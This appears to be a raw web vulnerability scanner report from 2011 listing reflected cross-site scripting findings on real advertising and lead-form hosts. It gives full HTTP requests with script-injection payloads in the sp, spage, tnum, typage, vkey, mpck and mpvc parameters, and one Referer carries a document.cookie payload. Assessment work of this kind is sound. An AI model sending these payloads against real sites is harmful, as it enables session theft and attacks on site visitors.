GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=47aa6"><script>alert(1)</script>17f7ae3a145&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:07 GMT Connection: close Set-Cookie: JSESSIONID=534417FF5679B259D78F3527F3B5F9FF.app6-all2; Path=/ Set-Cookie: JSESSIONID=AC3E67B01F08CE42EC4FAA382CAE04FE.app6-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:07 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033287262; Expires=Sat, 16-Feb-2019 12:48:07 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... ault&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=47aa6"><script>alert(1)</script>17f7ae3a145&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180 ...[SNIP]...
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f10"><script>alert(1)</script>4df01fa89ff was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=truec3f10"><script>alert(1)</script>4df01fa89ff&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:09 GMT Connection: close Set-Cookie: JSESSIONID=CE0040EAA12C8C817879FC115BC89A90.app6-all1; Path=/ Set-Cookie: JSESSIONID=B9D35294ACC0F93628BE2F3A67EAE738.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:09 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033289912; Expires=Sat, 16-Feb-2019 12:48:09 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... p://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=truec3f10"><script>alert(1)</script>4df01fa89ff&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=201235192036 ...[SNIP]...
The value of the spage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac565"><script>alert(1)</script>dea5f51ae06 was submitted in the spage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac565"><script>alert(1)</script>dea5f51ae06&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:02 GMT Connection: close Set-Cookie: JSESSIONID=9BAE8A9D6F92A1B449A843C6BAE0AE52.app6-all1; Path=/ Set-Cookie: JSESSIONID=DC8610B9DC97ABB633D752123FC11C7C.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:02 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033282568; Expires=Sat, 16-Feb-2019 12:48:02 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... m/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac565"><script>alert(1)</script>dea5f51ae06&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc2 ...[SNIP]...
The value of the tnum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d36"><script>alert(1)</script>fe8c1812c3f was submitted in the tnum parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1f9d36"><script>alert(1)</script>fe8c1812c3f&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:47:42 GMT Connection: close Set-Cookie: JSESSIONID=E3A83D033E10CFEBA392E0FA7676C378.app5-all2; Path=/ Set-Cookie: JSESSIONID=06A32FAF8D27AB0386D035C9A1780816.app5-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:42 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033262343; Expires=Sat, 16-Feb-2019 12:47:42 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... <Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1f9d36"><script>alert(1)</script>fe8c1812c3f&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendor ...[SNIP]...
The value of the typage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808"><script>alert(1)</script>8d9dbcd0750 was submitted in the typage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.aspee808"><script>alert(1)</script>8d9dbcd0750&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:01 GMT Connection: close Set-Cookie: JSESSIONID=6EE8FB9F2EFB6D605779F75A84C1C898.app5-all2; Path=/ Set-Cookie: JSESSIONID=16FA8362C193617FAA60E643F730515A.app5-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:01 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033281364; Expires=Sat, 16-Feb-2019 12:48:01 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... reet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.aspee808"><script>alert(1)</script>8d9dbcd0750&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw5 ...[SNIP]...
The value of the vkey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57229"><script>alert(1)</script>143b0a15cd4 was submitted in the vkey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=57229"><script>alert(1)</script>143b0a15cd4&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:00 GMT Connection: close Set-Cookie: JSESSIONID=23A3EF2447CE3E44D7A9C9D624F699E7.app5-all1; Path=/ Set-Cookie: JSESSIONID=E77003C1A4071CC4D9B5561B5C808894.app5-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:00 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033280128; Expires=Sat, 16-Feb-2019 12:48:00 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... alLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=57229"><script>alert(1)</script>143b0a15cd4&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=200997912 ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a74f<script>alert(1)</script>ffd953b27d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cmd6a74f<script>alert(1)</script>ffd953b27d2/virtacore?ps_t=1297999351117&ps_l=http%3A//www.powervps.com/&ps_r=&ps_s=EnEadSGx2lPF HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.powervps.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vsid=EnEadSGx2lPF
Response
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 18 Feb 2011 03:22:09 GMT Content-Length: 534
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5d61<script>alert(1)</script>246a70dc7ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsc5d61<script>alert(1)</script>246a70dc7ef/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999351024 HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.powervps.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 18 Feb 2011 03:22:07 GMT Content-Length: 569
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da0c0<a>e1423a3f174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js/virtacoreda0c0<a>e1423a3f174/safe-monitor.js?ps_h=581W&ps_t=1297999466909 HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.powervps.com/cpanel-plesk-vps.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vsid=EnEadSGx2lPF
Response
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 18 Feb 2011 03:24:04 GMT Content-Length: 547
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d142"%3balert(1)//eee3dea5e8d was submitted in the mpck parameter. This input was echoed as 3d142";alert(1)//eee3dea5e8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r3d142"%3balert(1)//eee3dea5e8d&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:27:21 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 23:20:25 GMT ETag: "5bff41-bfd-49ab3f6116040" Accept-Ranges: bytes Content-Length: 7177 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af630"%3balert(1)//5d7a8e72841 was submitted in the mpvc parameter. This input was echoed as af630";alert(1)//5d7a8e72841 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k=af630"%3balert(1)//5d7a8e72841 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:27:24 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 23:20:25 GMT ETag: "5bff41-bfd-49ab3f6116040" Accept-Ranges: bytes Content-Length: 7153 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e55af"%3balert(1)//56a40f07ee4 was submitted in the mpck parameter. This input was echoed as e55af";alert(1)//56a40f07ee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25re55af"%3balert(1)//56a40f07ee4&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:08 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 23:20:16 GMT ETag: "3b3dad-bfd-49ab3f5880c00" Accept-Ranges: bytes Content-Length: 6150 Content-Type: application/x-javascript
